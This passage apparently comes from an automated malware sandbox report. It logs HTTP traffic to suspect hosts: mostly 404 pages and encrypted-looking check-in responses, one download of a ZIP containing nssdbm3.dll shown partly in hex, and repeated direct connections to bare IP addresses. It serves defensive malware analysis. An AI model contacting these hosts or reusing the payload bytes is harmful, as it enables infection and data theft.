70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:44:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 01 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:45:00 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
